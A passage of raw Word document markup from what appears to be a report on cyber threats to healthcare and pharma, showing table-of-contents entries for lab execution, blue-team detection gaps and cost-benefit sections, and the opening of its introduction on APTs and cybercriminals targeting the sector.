            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571136" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Environment and Execution Documentation</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571136 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BE65E84" w14:textId="3FCACF4F" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571137" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Simulated Hybrid Architecture</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571137 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FC4D8F3" w14:textId="5F3D7752" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571138" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Execution Log and TTPs Utilised (Detailed Lab Report)</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571138 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DC3CACD" w14:textId="21FD3C7D" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571139" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Reporting and Analysis</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571139 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B480338" w14:textId="090DE824" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571140" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Technical Report for the Blue Team (Detection Gaps)</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571140 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44B07900" w14:textId="1866BA09" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571141" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Brief and Cost-Benefit Analysis (CBA)</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571141 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="411EC001" w14:textId="4EA92D28" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571142" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571142 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53B8B962" w14:textId="7A1F0F06" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571143" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571143 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B329227" w14:textId="70ACC854" w:rsidR="00F7143D" w:rsidRPr="00F7143D" w:rsidRDefault="00F7143D" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
          </w:pPr>
          <w:r w:rsidRPr="00874A6A">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="002060"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="1F66572D" w14:textId="77777777" w:rsidR="00917D2F" w:rsidRDefault="00917D2F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28295D0C" w14:textId="72FE433C" w:rsidR="00F76514" w:rsidRPr="000C0349" w:rsidRDefault="00F76514" w:rsidP="000C0349">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="000C0349">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Toc215571125"/>
      <w:r w:rsidRPr="000C0349">
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="55E353C6" w14:textId="77777777" w:rsidR="001150FA" w:rsidRPr="00A157FB" w:rsidRDefault="001150FA" w:rsidP="001150FA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A157FB">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Threats in Healthcare and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A157FB">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>Pharma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A157FB">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>: A High-Stakes Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D11B889" w14:textId="136B85A2" w:rsidR="001150FA" w:rsidRPr="00285046" w:rsidRDefault="001150FA" w:rsidP="001150FA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve">The healthcare and pharmaceutical industries are prime targets. Vast reserves of critical data sit there. These highly motivated actors constantly assault them. This includes state-sponsored Advanced Persistent Threats (APTs) for an economic and geopolitical edge, besides </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>very</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AE4B0D">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t>organised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
        <w:t xml:space="preserve"> cybercriminal groups aiming for a large financial payoff</w:t>
      </w:r>
      <w:hyperlink w:anchor="second" w:history="1">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
            </w:rPr>
            <w:id w:val="-1348478628"/>
            <w:citation/>
          </w:sdtPr>
          <w:sdtEndPr>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
            </w:rPr>
          </w:sdtEndPr>
          <w:sdtContent>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> CITATION Man23 \l 1033 </w:instrText>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007A16D1" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="0563C1" w:themeColor="hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
            <w:r w:rsidR="00014265" w:rsidRPr="007A16D1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:sdtContent>
        </w:sdt>
      </w:hyperlink>
      <w:r w:rsidRPr="00285046">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FBFCFE"/>
        </w:rPr>
